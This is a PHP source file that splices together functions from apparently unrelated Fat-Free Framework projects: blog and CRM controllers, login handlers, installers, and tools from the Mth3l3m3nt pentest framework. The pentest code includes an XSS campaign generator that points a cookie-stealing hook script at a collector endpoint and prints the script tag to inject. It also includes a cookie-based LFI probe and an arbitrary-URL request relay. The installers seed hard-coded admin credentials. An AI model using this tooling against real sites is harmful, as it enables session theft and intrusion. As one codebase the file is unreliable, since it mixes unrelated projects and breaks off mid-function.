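/**
 * Validate an e-mail address and, optionally, that its domain has a mail host.
 *
 * On failure an HTTP 400 error is raised through the framework ($this->f3->error)
 * with a message looked up in the hive under "$context.invalid" / "$context.host",
 * falling back to a built-in English string, and the Flash key for $context is
 * marked 'has-error'. An empty value is treated as valid: required-ness is not
 * this validator's job.
 *
 * @param string      $val     value to validate
 * @param string|null $context hive key prefix for the error texts; defaults to 'error.validation.email'
 * @param bool        $mx      also require a resolvable mail host for the domain
 * @return bool true when the value is empty or passes every enabled check
 */
function email($val, $context = null, $mx = true)
{
    if (!$context) {
        $context = 'error.validation.email';
    }
    if (empty($val)) {
        return true;
    }
    $audit = \Audit::instance();
    if (!$audit->email($val, false)) {
        $errKey = $context . '.invalid';
        $errText = 'e-mail is not valid';
    } elseif ($mx && !$audit->email($val, true)) {
        // Syntax is fine but Audit could not find a mail host for the domain.
        $errKey = $context . '.host';
        $errText = 'unknown mail mx.host';
    } else {
        return true;
    }
    // exists() fills $configured with the hive value when the key is present,
    // so a configured message overrides the built-in fallback.
    if ($this->f3->exists($errKey, $configured)) {
        $errText = $configured;
    }
    // The 400 handler (see render()) turns this into a warning and lets the page continue.
    $this->f3->error(400, $errText);
    \Flash::instance()->setKey($context, 'has-error');
    return false;
}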
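/**
 * Render the framework error page (F3 ONERROR handler).
 *
 * Discards any buffered output, then:
 *  - AJAX requests get a JSON body {"error": text} and the script terminates;
 *  - HTTP 400 is downgraded to a Flash warning and normal rendering resumes (HALT=false);
 *  - 404/405/500 get a descriptive headline; on 500 the highlighted stack trace is exposed
 *    only when DEV is set, and text + trace are mailed to the configured 'error_mail';
 *  - everything else is rendered through themes/default/layout.html with LAYOUT=error.html.
 *
 * Template auto-escaping (ESCAPE) is switched off so the highlighted trace renders as HTML.
 * Because of that the error text is escaped here explicitly before it reaches the template:
 * ERROR.text may carry request-derived details and must not be emitted raw. If error.html
 * already escapes {{ @text }} itself, drop the htmlspecialchars() call to avoid double escaping.
 */
function render()
{
    // Clean all output given first
    while (ob_get_level()) {
        ob_end_clean();
    }
    $f3 = \Base::instance();
    $code = $f3->get('ERROR.code');
    $text = (string) $f3->get('ERROR.text');

    $f3->set('headline', 'Error ' . $code);
    // ESCAPE is disabled below for the trace markup; escape the text ourselves.
    $f3->set('text', htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));
    $f3->set('ESCAPE', false);

    if ($f3->get('AJAX')) {
        if (!headers_sent()) {
            header('Content-Type: application/json');
        }
        die(json_encode(array('error' => $text)));
    }
    if ($code == 400) {
        // Validation-style error: surface it as a warning and let the page continue.
        \Flash::instance()->addMessage($text, 'warning');
        $f3->set('HALT', false);
        return;
    }
    if ($code == 404) {
        $f3->set('headline', 'Page not found');
    } elseif ($code == 405) {
        $f3->set('headline', 'This action is not allowed');
    } elseif ($code == 500) {
        $f3->set('headline', 'Internal Server Error');
        $trace = $f3->get('ERROR.trace');
        if ($f3->get('DEV')) {
            // highlight() returns HTML, which is why ESCAPE is off for this page.
            $f3->set('trace', $f3->highlight($trace));
        }
        // Best-effort notification; a mail() failure must not mask the original error.
        if ($f3->get('error_mail')) {
            @mail($f3->get('error_mail'), 'Mth3l3m3nt Framework Error', $text . "\n\n" . $trace);
        }
    }
    $f3->set('LAYOUT', 'error.html');
    $f3->set('HALT', true);
    echo \Template::instance()->render('themes/default/layout.html');
}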
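/**
 * Create the tables for the blog models and seed a demo admin account.
 *
 * Selects the DB connection registered under $db_type (case-insensitive) in storage, runs
 * setup() for Post/Tag/Comment/User, and — only if no 'admin' user exists yet — inserts one
 * with the hard-coded credentials below. Those credentials are announced in a Flash message,
 * so this installer must not be reachable on a production host and the password should be
 * changed immediately after setup.
 *
 * Fix: when no DB matches, return after $f3->error() so setup() never runs unbound if the
 * error handler returns instead of halting.
 *
 * @param string $db_type storage key of the database to use (upper-cased here)
 */
public function install($db_type)
{
    $f3 = \Base::instance();
    $db_type = strtoupper($db_type);
    $db = storage::instance()->get($db_type);
    if (!$db) {
        $f3->error(256, 'no valid DB specified');
        return;
    }
    $f3->set('DB', $db);

    // setup the models
    \Model\Post::setup();
    \Model\Tag::setup();
    \Model\Comment::setup();
    \Model\User::setup();

    // create demo admin user (only when absent, so re-running install is safe)
    $user = new \Model\User();
    $user->load(array('username = ?', 'admin'));
    if ($user->dry()) {
        // NOTE(review): default credentials; whether save() hashes the password is up to the model.
        $user->username = '******';
        $user->name = 'Administrator';
        $user->password = '******';
        $user->save();
        \Flash::instance()->addMessage('Admin User created,' . ' username: admin, password: fabulog', 'success');
    }
    \Flash::instance()->addMessage('Setup complete', 'success');
}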
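/**
 * Generate the hook script for an XSS campaign (POST) and tell the user how to embed it.
 *
 * Copies scripts/attack_temp.mth3l3m3nt to scripts/<target host>.js under ROOT.BASE, rewrites
 * the two placeholder URLs in it (the collector endpoint becomes this site's /xssr, the victim
 * page becomes the submitted target URL) and flashes the <script> tag to attach. The form is
 * reached via SUBPART 'xssrc_campaign.html'.
 *
 * The campaign file name is derived from POST.targetUrl, so the host part must be a plain
 * hostname (letters, digits, '.', '-') before it is used as a path component; previously a URL
 * without a host produced a file named '.js' and copy()/write failures went unnoticed.
 * Bracketed IPv6 literals are rejected by the same check.
 *
 * NOTE(review): the target URL is spliced into the JavaScript verbatim; a URL containing a
 * quote will break the generated script.
 *
 * @param \Base $f3 framework instance (reads VERB, POST.targetUrl, ROOT/BASE/SCHEME/HOST)
 */
function create_campaign(\Base $f3)
{
    $this->response->data['SUBPART'] = 'xssrc_campaign.html';
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($f3->devoid('POST.targetUrl')) {
        \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
        return;
    }
    $target_url = $f3->get('POST.targetUrl');
    $c_host = parse_url($target_url, PHP_URL_HOST);
    // Only a well-formed hostname may become part of a file name under scripts/.
    if (!is_string($c_host) || $c_host === '' || !preg_match('/^[A-Za-z0-9.-]+$/', $c_host)) {
        \Flash::instance()->addMessage('Target url must be an absolute URL with a valid hostname e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
        return;
    }
    $scripts_dir = $f3->ROOT . $f3->BASE . '/scripts/';
    $template_src = $scripts_dir . 'attack_temp.mth3l3m3nt';
    $campaign_file = $scripts_dir . $c_host . '.js';
    $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
    $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';

    // Read the template once and write the rewritten copy (no intermediate copy()).
    if (!is_file($template_src)) {
        \Flash::instance()->addMessage('Attack script template not found: ' . $template_src, 'danger');
        return;
    }
    $template = file_get_contents($template_src);
    if ($template === false) {
        \Flash::instance()->addMessage('Attack script template could not be read: ' . $template_src, 'danger');
        return;
    }
    $prepped = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $template);
    $prepped = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $prepped);
    if (file_put_contents($campaign_file, $prepped) === false) {
        \Flash::instance()->addMessage('Could not write campaign script: ' . $campaign_file, 'danger');
        return;
    }
    $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
    $this->response->data['content'] = $instructions;
}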
/**
 * Return the shared Flash object, creating it on first use.
 *
 * @return Flash
 */
public static function getInstance()
{
    if (self::$instance) {
        return self::$instance;
    }
    self::$instance = new Flash();
    return self::$instance;
}
/**
 * Lazily construct and return the single Flash instance.
 *
 * @return Flash
 */
public static function instance()
{
    $existing = Flash::$instance;
    if ($existing !== NULL) {
        return $existing;
    }
    Flash::$instance = new Flash();
    return Flash::$instance;
}
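/**
 * Login Procedure
 *
 * When both POST.username and POST.password are present the user record is looked up by
 * username and the password is checked with the engine named in 'password_hash_engine'
 * ('bcrypt' via \Bcrypt, or salted 'md5' using 'password_md5_salt'). On success the session
 * is cleared, SESSION.user_id is set, the session id is regenerated and the request is
 * rerouted (HTTPS root when CONFIG.ssl_backend is set, else /cnc). Every failure — unknown
 * user, wrong password, unknown engine — shows the same 'Wrong Username/Password' message
 * after the same 3-second delay, so the response does not reveal whether the username exists.
 *
 * Fixes: the md5 branch compared hashes with '==', which is subject to PHP's numeric-string
 * juggling ("0e..." digests compare equal) — it now uses a strict/constant-time comparison;
 * and the session id is actually regenerated at login (the old comment promised it, the code
 * only cleared the session), closing session fixation.
 *
 * NOTE(review): the md5 engine is legacy; accounts should be migrated to bcrypt.
 *
 * @param \Base $f3     framework instance
 * @param array $params route parameters (unused)
 */
public function login($f3, $params)
{
    if ($f3->exists('POST.username') && $f3->exists('POST.password')) {
        sleep(3); // login should take a while to kick-ass brute force attacks
        $user = new \Model\User();
        $user->load(array('username = ?', $f3->get('POST.username')));
        if (!$user->dry()) {
            // check hash engine
            $hash_engine = $f3->get('password_hash_engine');
            $password = $f3->get('POST.password');
            $valid = false;
            if ($hash_engine == 'bcrypt') {
                $valid = \Bcrypt::instance()->verify($password, $user->password);
            } elseif ($hash_engine == 'md5') {
                $expected = md5($password . $f3->get('password_md5_salt'));
                $stored = (string) $user->password;
                // hash_equals() (PHP >= 5.6) is constant-time; '===' at least avoids type juggling.
                $valid = function_exists('hash_equals') ? hash_equals($stored, $expected) : ($stored === $expected);
            }
            if ($valid) {
                @$f3->clear('SESSION');
                $f3->set('SESSION.user_id', $user->_id);
                // Issue a fresh session id so a pre-login id cannot be reused (session fixation).
                // Done after the SESSION write, which is what makes F3 start the session.
                if (session_id() !== '') {
                    session_regenerate_id(true);
                }
                if ($f3->get('CONFIG.ssl_backend')) {
                    $f3->reroute('https://' . $f3->get('HOST') . $f3->get('BASE') . '/');
                } else {
                    $f3->reroute('/cnc');
                }
            }
        }
        \Flash::instance()->addMessage('Wrong Username/Password', 'danger');
    }
    $this->response->setTemplate('templates/login.html');
}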
/**
 * Init Flash service
 *
 * Loads the stored flash data via readFlash(). Works both when called on an instance and when
 * called statically, in which case the call is forwarded to the shared instance.
 *
 * @param void
 * @return null
 */
function init()
{
    $calledOnInstance = isset($this) && instance_of($this, 'Flash');
    if (!$calledOnInstance) {
        $instance =& Flash::instance();
        $instance->init();
        return;
    }
    $this->readFlash();
}
/**
 * Load one comment for the edit form.
 *
 * Sets SUBPART to comment_edit.html and, when $params['id'] is given and matches a record,
 * stores the loaded resource under response data 'comment' and returns true. Otherwise an
 * 'Unknown Comment ID' message is flashed and the request is rerouted to SESSION.LastPageURL
 * (reroute is expected to end the request, so nothing is returned on that path).
 *
 * @param \Base $f3
 * @param array $params
 * @return bool
 */
public function getSingle(\Base $f3, $params)
{
    $this->response->data['SUBPART'] = 'comment_edit.html';
    $found = false;
    if (isset($params['id'])) {
        $loaded = $this->resource->load(array('_id = ?', $params['id']));
        $this->response->data['comment'] = $loaded;
        $found = !$this->resource->dry();
    }
    if ($found) {
        return true;
    }
    \Flash::instance()->addMessage('Unknown Comment ID', 'danger');
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
 * Delete the calendar event identified by the request's 'id' and redirect.
 *
 * On success flashes a message and sends the user to the crmcalendars index; on failure
 * flashes an error and sends them back.
 *
 * NOTE(review): no permission check precedes the delete here (the despatch-event delete in
 * this codebase gates on hasPermission) — confirm access is enforced before this action runs.
 */
public function delete()
{
    $flash = Flash::instance();
    $event = $this->_templateobject;
    $event->load($this->_data['id']);
    $deleted = $event->delete();
    if (!$deleted) {
        $flash->addError('Failed to delete event');
        sendBack();
        return;
    }
    $flash->addMessage('Event deleted successfully');
    sendTo('crmcalendars', 'index', $this->_modules);
}
/**
 * Delete a record, refusing to remove the demo admin on the public demo host.
 *
 * Loads $params['id']; when the site runs on host ikkez.de and the record is the user
 * 'admin', a 'danger' message is flashed and the request is rerouted to /admin/<module>
 * instead. Otherwise the parent delete runs and the request is rerouted to
 * SESSION.LastPageURL.
 *
 * @param \Base $f3
 * @param array $params route params: 'id', 'module'
 */
public function delete(\Base $f3, $params)
{
    $this->resource->reset();
    $msg = \Flash::instance();
    if (isset($params['id'])) {
        $this->resource->load(array('_id = ?', $params['id']));
        $isDemoHost = $f3->get('HOST') == 'ikkez.de';
        $isAdminUser = !$this->resource->dry() && $this->resource->username == 'admin';
        if ($isDemoHost && $isAdminUser) {
            $msg->addMessage("You are not allowed to delete the demo-admin", 'danger');
            $f3->reroute('/admin/' . $params['module']);
            return;
        }
        parent::delete($f3, $params);
    }
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
 * delete a record
 *
 * Loads the record for $params['id'] and erases it, flashing 'Record deleted.' on success or
 * 'No record found with this ID.' when nothing matches; without an id nothing is touched.
 * Always ends by rerouting to SESSION.LastPageURL.
 *
 * @param \Base $f3
 * @param array $params
 */
public function delete(\Base $f3, $params)
{
    $this->resource->reset();
    $flash = \Flash::instance();
    if (isset($params['id'])) {
        $this->resource->load(array('_id = ?', $params['id']));
        $exists = !$this->resource->dry();
        if ($exists) {
            $this->resource->erase();
            $flash->addMessage("Record deleted.", 'success');
        } else {
            $flash->addMessage('No record found with this ID.', 'danger');
        }
    }
    $f3->reroute($f3->get('SESSION.LastPageURL'));
}
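/**
 * Hurl.it-style request relay: fetch a user-supplied URL with a chosen HTTP method and show
 * the raw response (headers, body, engine) under response data 'content'.
 *
 * POST.url is validated with Audit::url(); POST.means selects the method (GET, POST, HEAD,
 * OPTIONS or TRACE); for POST the form body from POST.postReceive ("a=1&b=2") is parsed with
 * parse_str() and re-encoded as the request content.
 *
 * This deliberately makes server-side requests to arbitrary hosts (it is a pentest utility),
 * so it must stay behind authentication and off any host that can reach internal services.
 *
 * Fixes: the form body was read from 'Post.postReceive' (wrong key case, so always empty)
 * and split with explode(), which http_build_query() then encoded as "0=a%3D1&1=b%3D2";
 * and the method string was passed to the transport unchecked, where it lands in the
 * request line — it is now restricted to the same set the newer version of this handler
 * accepts.
 *
 * @param \Base $f3
 */
public function generic_request(\Base $f3)
{
    $web = \Web::instance();
    $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
    $audit_instance = \Audit::instance();
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($f3->devoid('POST.url')) {
        \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
        return;
    }
    $address = $f3->get('POST.url');
    if (!$audit_instance->url($address)) {
        \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
        return;
    }
    // NOTE: on shared hosts with safe_mode/open_basedir the cURL engine may refuse to follow
    // redirects; add 'follow_location' => FALSE to $options if that happens.
    $method = (string) $f3->get('POST.means');
    if (!in_array($method, array('GET', 'POST', 'HEAD', 'OPTIONS', 'TRACE'), true)) {
        \Flash::instance()->addMessage('Unsupported Header Method', 'danger');
        return;
    }
    $options = array('method' => $method);
    if ($method == "POST") {
        //handle POST data: "a=1&b=2" -> array('a' => '1', 'b' => '2')
        $postData = array();
        parse_str((string) $f3->get('POST.postReceive'), $postData);
        $options['content'] = http_build_query($postData);
    }
    $request_successful = $web->request($address, $options);
    if (!$request_successful) {
        \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
        return;
    }
    $result_body = $request_successful['body'];
    $result_headers = $request_successful['headers'];
    $engine = $request_successful['engine'];
    $headers_max = implode("\n", $result_headers);
    $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
}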
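/**
 * Handles Your little Hurl.it like service to make requests to remote servers using various methods
 *
 * Validates POST.url with Audit::url(), relays the request with the method from POST.means
 * (GET, POST, HEAD, OPTIONS or TRACE; POST sends POST.postReceive parsed with parse_str() as
 * the body) and stores the raw headers/body/engine report under response data 'content'.
 * Redirects are not followed when safe_mode is on (cURL refuses FOLLOWLOCATION there).
 *
 * Fix: an unsupported method left $request_successful undefined, so the 'Something went
 * wrong' warning (and a notice) followed the 'Unsupported Header Method' one; that path now
 * returns. The unused result of parse_str() (it returns nothing) is no longer captured.
 *
 * This relays server-side requests to arbitrary hosts by design (pentest utility); keep it
 * behind authentication and away from hosts that can reach internal networks.
 *
 * @package Controller
 * @param \Base $f3
 */
public function generic_request(\Base $f3)
{
    $web = \Web::instance();
    $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
    $audit_instance = \Audit::instance();
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($f3->devoid('POST.url')) {
        \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
        return;
    }
    $address = $f3->get('POST.url');
    if (!$audit_instance->url($address)) {
        \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
        return;
    }
    // safe_mode (removed in PHP 5.4) blocks cURL redirect following; ini_get() is '' / false elsewhere.
    $follow_loc = ini_get('safe_mode') ? FALSE : TRUE;
    $means = $f3->get('POST.means');
    if ($means == "POST") {
        //handle POST data
        $postData = array();
        parse_str((string) $f3->get('POST.postReceive'), $postData);
        $options = array('method' => $means, 'content' => http_build_query($postData), 'follow_location' => $follow_loc);
    } elseif (in_array($means, array("GET", "TRACE", "OPTIONS", "HEAD"), true)) {
        $options = array('method' => $means, 'follow_location' => $follow_loc);
    } else {
        // Anything else never reaches the transport (the value lands in the request line).
        \Flash::instance()->addMessage('Unsupported Header Method', 'danger');
        return;
    }
    $request_successful = $web->request($address, $options);
    if (!$request_successful) {
        \Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
        return;
    }
    $result_body = $request_successful['body'];
    $result_headers = $request_successful['headers'];
    $engine = $request_successful['engine'];
    $headers_max = implode("\n", $result_headers);
    $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
}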
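/**
 * Installs tables with default user
 *
 * Binds the DB registered in DBHandler under $db_type (upper-cased), runs setup() for the
 * User, Payload and Webot models and, if the 'mth3l3m3nt' user is absent, creates it with the
 * built-in credentials and imports the payload starter pack from
 * db_dump_optional/mth3l3m3nt_payload (a JSON list of payload records) when that file exists.
 * Progress and the created credentials are reported through Flash messages, so this must not
 * be reachable on a production deployment and the password should be changed right after.
 *
 * Fixes: stops after $f3->error() when no DB matches (setup() must not run unbound), and
 * refuses a starter pack that does not decode to a JSON array instead of iterating null.
 *
 * @param $db_type
 */
public function install($db_type)
{
    $f3 = \Base::instance();
    $db_type = strtoupper($db_type);
    $db = DBHandler::instance()->get($db_type);
    if (!$db) {
        $f3->error(256, 'no valid Database Type specified');
        return;
    }
    $f3->set('DB', $db);

    // setup the models
    \Model\User::setup();
    \Model\Payload::setup();
    \Model\Webot::setup();

    // create demo admin user
    $user = new \Model\User();
    $user->load(array('username = ?', 'mth3l3m3nt'));
    if ($user->dry()) {
        // NOTE(review): default credentials; hashing on save() is the model's responsibility.
        $user->username = '******';
        $user->name = 'Framework Administrator';
        $user->password = '******';
        $user->email = '*****@*****.**';
        $user->save();
        $this->importPayloadStarterPack($f3);
        \Flash::instance()->addMessage('Admin User created,' . ' username: mth3l3m3nt, password: mth3l3m3nt', 'success');
    }
    \Flash::instance()->addMessage('New Database Setup Completed', 'success');
}

/**
 * Import db_dump_optional/mth3l3m3nt_payload into the Payload model, one record per entry.
 *
 * Reports the outcome via Flash: success when the pack was imported, 'danger' when the file
 * is missing or does not decode to a JSON array.
 *
 * @param \Base $f3
 */
private function importPayloadStarterPack(\Base $f3)
{
    $payload_file = $f3->ROOT . $f3->BASE . '/db_dump_optional/mth3l3m3nt_payload';
    if (!file_exists($payload_file)) {
        \Flash::instance()->addMessage('Payload StarterPack: ,' . 'StarterPack Database not Found no payloads installed ', 'danger');
        return;
    }
    $payloadarray = json_decode($f3->read($payload_file), true);
    if (!is_array($payloadarray)) {
        \Flash::instance()->addMessage('Payload StarterPack: ,' . 'StarterPack Database is not valid JSON no payloads installed ', 'danger');
        return;
    }
    $fields = array('pName', 'pType', 'pCategory', 'pDescription', 'payload');
    $payload = new \Model\Payload();
    foreach ($payloadarray as $payloaddata) {
        foreach ($fields as $field) {
            // A missing key becomes null rather than raising a notice per record.
            $payload->$field = isset($payloaddata[$field]) ? $payloaddata[$field] : null;
        }
        $payload->save();
        //ensures values set to null before continuing update
        $payload->reset();
    }
    //migtate payloads
    \Flash::instance()->addMessage('Payload StarterPack: ,' . 'All Starter Pack Payloads added New database', 'success');
}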
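/**
 * Database settings page: save the chosen DB config and (re)install the schema on it.
 *
 * On POST with 'active_db', stores POST.DB_<type> under config key DB_<type>, marks that type
 * active, persists the config, runs Setup::install() for it (which runs the models' setup())
 * and clears SESSION.user_id, logging the current user out. The config is then copied into
 * POST so the form shows the saved values; JIG_format lists the formats offered for JIG.
 *
 * The type is used both as a dynamic config property name and as a storage key, so it is
 * restricted to word characters before use.
 *
 * @param \Base $f3
 */
public function database(\Base $f3)
{
    $this->response->data['SUBPART'] = 'settings_database.html';
    $cfg = \Config::instance();
    if ($f3->get('VERB') == 'POST' && $f3->exists('POST.active_db')) {
        $type = (string) $f3->get('POST.active_db');
        if (!preg_match('/^\w+$/', $type)) {
            \Flash::instance()->addMessage('Invalid database type', 'danger');
        } else {
            $cfg->{'DB_' . $type} = $f3->get('POST.DB_' . $type);
            $cfg->ACTIVE_DB = $type;
            $cfg->save();
            \Flash::instance()->addMessage('Config saved', 'success');
            $setup = new \Setup();
            $setup->install($type);
            // logout: the session no longer refers to a row in the freshly set-up user table
            $f3->clear('SESSION.user_id');
        }
    }
    $cfg->copyto('POST');
    $f3->set('JIG_format', array('JSON', 'Serialized'));
}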
/**
 * Admin login form handler.
 *
 * Looks the user up by POST.email and checks the password through User::checkLogin(). On
 * success the session gets user_type 'admin' and, unless 'remember' was ticked, the user id
 * and the user object; with 'remember' a cookie 'user' holding the bare id is set instead.
 * The request is then rerouted to @admin_home. On failure a 'danger' message is flashed and
 * the login page is rendered again via index().
 *
 * NOTE(review): the remember-me cookie is the plain user id, which anyone can forge if other
 * code trusts it; it should carry a random token tied to the account. The third argument to
 * set('COOKIE...') is an absolute timestamp here — check whether the framework expects a TTL
 * in seconds instead. The session id is not regenerated at login either.
 *
 * @param \Base $f3
 */
function post_index($f3)
{
    $email = $f3->POST['email'];
    $user = \User::createUser(\kksd\Sesi::$DB);
    $user->load(array("email=?", $email));
    $loggedIn = $user->checkLogin($f3->get('POST.email'), $f3->get('POST.password'));
    if (!$loggedIn) {
        \Flash::instance()->addMessage('Wrong password, you morron!', 'danger');
        $this->index($f3);
        return;
    }
    $user->load(array("email=?", $email));
    $f3->SESSION['user_type'] = 'admin';
    if ($f3->POST['remember']) {
        $f3->set('COOKIE.user', $user->id, time() + 24 * 3600 * 7);
    } else {
        $f3->SESSION['user'] = $user->id;
        $f3->SESSION['user_obj'] = $user;
    }
    $f3->reroute('@admin_home');
    return;
}
/**
 * WHOIS lookup form: query POST.hostname through Web::whois() and show the raw record.
 *
 * Renders SUBPART websaccre_whois.html; on POST a missing hostname or a failed lookup yields
 * a warning, otherwise the WHOIS text is placed under response data 'content'.
 *
 * NOTE(review): the hostname is handed to the whois transport unvalidated — confirm
 * Web::whois() rejects non-hostname input (e.g. embedded CR/LF) before writing to the socket.
 *
 * @param \Base $f3
 */
public function getwhois(\Base $f3)
{
    $web = \Web::instance();
    $this->response->data['SUBPART'] = 'websaccre_whois.html';
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($f3->devoid('POST.hostname')) {
        \Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
        return;
    }
    $record = $web->whois($f3->get('POST.hostname'));
    if (!$record) {
        \Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
        return;
    }
    $this->response->data['content'] = $record;
}
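/**
 * Cancel a despatch event (status 'X') after checking the despatch 'edit' permission.
 *
 * The event identified by the request's 'id' is loaded, its status set to 'X' (a soft delete:
 * the row is kept) and saved through the parent controller; success redirects to the
 * sodespatchevents index, failure flashes an error and sends the user back. A missing
 * permission flashes an error and sends the user back without touching the event.
 *
 * Fix: $flash was only assigned inside the permitted branch, so the permission-denied path
 * called addError() on an undefined variable.
 */
public function delete()
{
    $flash = Flash::instance();
    $accessobject = AccessObject::Instance();
    $editable = $accessobject->hasPermission('despatch', 'sodespatchevents', 'edit');
    if (!$editable) {
        $flash->addError("You don't have permission to delete an event");
        sendBack();
        return;
    }
    $event = $this->_uses['SODespatchEvent'];
    $event->load($this->_data['id']);
    $this->_data['SODespatchEvent']['id'] = $this->_data['id'];
    $this->_data['SODespatchEvent']['status'] = 'X';
    if (parent::save('SODespatchEvent')) {
        $flash->clearMessages();
        $flash->addMessage("Event successfully deleted");
        sendTo('sodespatchevents', 'index', array('despatch'));
    } else {
        $flash->addError("Failed to delete event");
        sendBack();
    }
}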
/**
 * Send one request with an LFI payload in the Cookie header and report whether it returned 200.
 *
 * Builds the request with $method, a fixed browser-like header set and 'Cookie: <payload>',
 * validates $url with Audit::url() and, on POST, fires it via Web::request(). A '200 OK'
 * status line stores the full headers/body/engine dump under response data 'content'; any
 * other status stores a 'Not Exploitable' note with the headers. A blank or invalid URL and
 * transport failures are reported as Flash messages.
 *
 * @param string $method   HTTP method for the probe
 * @param bool   $blankurl true when the form submitted no URL
 * @param string $url      target URL
 * @param string $payload  cookie string carrying the LFI payload
 */
public function cookie_based_lfi($method, $blankurl, $url, $payload)
{
    $web = \Web::instance();
    $f3 = \Base::instance();
    $probeHeaders = array(
        'Accept: */*',
        'User-Agent: Mth3l3m3ntFramework/4.0 (compatible; MSIE 6.0; HackingtoshTuxu 4.0; .NET CLR 1.1.4322)',
        'Cookie: ' . $payload,
        'Connection: Close',
        'Pragma: no-cache',
        'Cache-Control: no-cache',
    );
    $options = array('method' => $method, 'header' => $probeHeaders);
    $audit_instance = \Audit::instance();
    if ($f3->get('VERB') != 'POST') {
        return;
    }
    if ($blankurl) {
        \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
        return;
    }
    if ($audit_instance->url($url) != TRUE) {
        \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
        return;
    }
    $reply = $web->request($url, $options);
    if (!$reply) {
        \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
        return;
    }
    $result_headers = $reply['headers'];
    $headers_max = implode("\n", $result_headers); //convert array header to string
    $response_header = $result_headers["0"];
    if (strpos($response_header, '200 OK') === false) {
        $this->response->data['content'] = "Not Exploitable Application Returned the response below: \n\n " . $headers_max;
        return;
    }
    $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $reply['body'] . "\n\n Engine Used: " . $reply['engine'];
}
/**
 * Save a person (create or update) together with address, contact methods and categories.
 *
 * Flow:
 *  1. checkParams() must pass for the template model; on failure sendBack() is called
 *     (the code assumes sendBack() ends the request — there is no return after it).
 *  2. For an existing id the person is loaded; a failed load is reported as a permission
 *     error and the user is sent to the index.
 *  3. Inside a DB transaction: a pre-selected address drops the submitted Address block,
 *     a new address is checked via PartyAddress, and each contact-method type is either
 *     deleted (blank contact, existing record), dropped (blank, new) or validated.
 *  4. parent::save() persists the person; afterwards category membership is diffed against
 *     ContactCategories: categories still required by a ledger entry (LedgerCategory::
 *     checkPersonUsage) cannot be removed, others are deleted/inserted in PeopleInCategories.
 *  5. Success commits and redirects to 'view'; any error adds the messages to Flash, fails
 *     the transaction and refreshes the form.
 *
 * NOTE(review): $check_categories is assigned but never used. The success path relies on
 * sendTo() terminating the request; if it returned, the trailing FailTrans() would run after
 * CompleteTrans().
 */
public function save()
{
    $errors = array();
    $person = $this->_templateobject;
    $personmodel = get_class($person);
    if (!$this->checkParams($personmodel)) {
        sendBack();
    }
    $persondata = $this->_data[$personmodel];
    $personidfield = $person->idField;
    if (isset($persondata[$person->idField])) {
        $personid = $persondata[$personidfield];
    } else {
        $personid = '';
    }
    if (!empty($personid)) {
        $person->load($personid);
        if (!$person->isLoaded()) {
            // A failed load (missing row or no access) is reported as a permission problem.
            $flash = Flash::instance();
            $flash->addError('You do not have permission to edit this person.');
            sendTo($this->name, 'index', $this->_modules);
            return;
        }
    }
    $flash = Flash::Instance();
    $db =& DB::Instance();
    $db->StartTrans();
    if (isset($this->_data['Address']) && !empty($this->_data['Address']['id'])) {
        // Selected pre-existing address
        unset($this->_data['Address']);
    }
    if (isset($this->_data['PartyAddress']) && isset($this->_data['Address'])) {
        $partyaddress = DataObjectFactory::Factory('PartyAddress');
        $partyaddress->checkAddress($this->_data);
    }
    // One submitted block per contact-method type, keyed by the enum option text.
    $partycontactmethod = DataObjectFactory::Factory('PartyContactMethod');
    foreach ($partycontactmethod->getEnumOptions('type') as $key => $type) {
        if (isset($this->_data[$type]['PartyContactMethod']) && isset($this->_data[$type]['Contactmethod'])) {
            if (empty($this->_data[$type]['Contactmethod']['contact'])) {
                // Blank contact: remove an existing record and drop the block from the save.
                if (!empty($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField])) {
                    $partycontactmethod->delete($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField], $errors);
                }
                unset($this->_data[$type]);
            } else {
                $partycontactmethod->check($this->_data[$type]);
            }
        }
    }
    if (count($errors) == 0 && parent::save($personmodel, $this->_data, $errors)) {
        // Pick the saved person object out of the models the parent save produced.
        foreach ($this->saved_models as $model) {
            if (isset($model[$personmodel])) {
                $person = $model[$personmodel];
                break;
            }
        }
        // Now get the saved Person details
        $person_id = $person->{$personidfield};
        $people_category = DataObjectFactory::Factory('PeopleInCategories');
        $current_categories = $people_category->getCategoryID($person_id);
        $check_categories = array();
        $delete_categories = array();
        $insert_categories = array();
        $new_categories = array();
        if (isset($this->_data['ContactCategories'])) {
            // Diff the submitted categories against the current set
            // (array_diff keeps the keys of $current_categories, used by delete() below).
